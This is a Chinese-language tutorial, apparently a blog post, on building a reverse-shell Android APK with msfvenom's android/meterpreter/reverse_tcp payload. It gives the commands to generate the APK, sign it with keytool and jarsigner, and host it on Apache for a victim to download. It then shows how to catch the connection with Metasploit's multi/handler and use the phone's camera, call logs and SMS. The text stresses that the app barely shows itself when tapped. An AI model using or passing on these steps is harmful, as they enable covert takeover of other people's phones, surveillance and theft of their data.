我这里利用的是android/meterpreter/reverse_tcp 类型的payload 实现的复现
第一步:这个例子需要输入自己的ip和端口,首先打开kali,输入ifconfig查看一下我们的ip地址,在这里我的ip是192.168.1.110

第二步:生成payload(msfvenom命令中默认没有apk这种格式的文件。此处使用R来替代-f和-o) 然后我们就在kali命令栏直接输入
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.110 lport=4444 R>/root/shell.apk
lhost后面输的是自己的ip地址,lport后面输的是端口,随便一个端口就可以,R>后面是生成文件的位置和名称,我这里就在主目录下生成了名为shell.apk的文件


第三步:之后为软件添加签名, 创建签名需要使用Keytool、JARsigner、zipalign命令,首先是这个
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
这里首先自己设置一个密码,然后问一些姓氏什么的随便填,最后输入y或者yes就完成了,会生成一个文件


使用该key文件配合JARsigner为APK签名
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore shell.apk alias_name

最后在使用JARsigner验证签名
jarsigner -verify -verbose -certs shell.apk

到这里,签名就全部完成了,此apk就可以在Android使用
第四步:可以实现手机访问kali的ip直接下载apk文件,然后我们启动kali自带的apache服务(注:必须是同一个局域网,要是你有公网ip就当我没说)
service apache2 start

之后把我们的apk文件复制到apache服务的根目录下

如果这里报错说权限不够,可以在最前面加上sudo
ls显示一下这个根目录有什么,就能看到shell.apk已经在这里面了

到这手机就可以直接访问我们kali的ip地址加上shell.apk下载这个apk文件了,例:192.168.1.110 /shell.apk
第五步:开启主动端,等待连接
使用msfconsole开启Metasploit

使用监听模块exploit/multi/handler

设置自己kali的ip和之前输入的端口号,然后直接run就开始监听了,只要对方手机点击了这个软件(只是闪动一下,没有实际显示),就能够对他的手机进行一些命令


第六步:进行命令控制
webcam_snap 1实现使用摄像头拍照

在CAGqVm那个网页中实现摄像头的实时录像

复制最近的通话记录到主文件


用这个代码可以实现对指定手机发送指定短信

里面还有很多功能,如定位(由于是国外的,所以必须有谷歌地图才能实现)等,可以使用help命令来查看,感谢大家!!!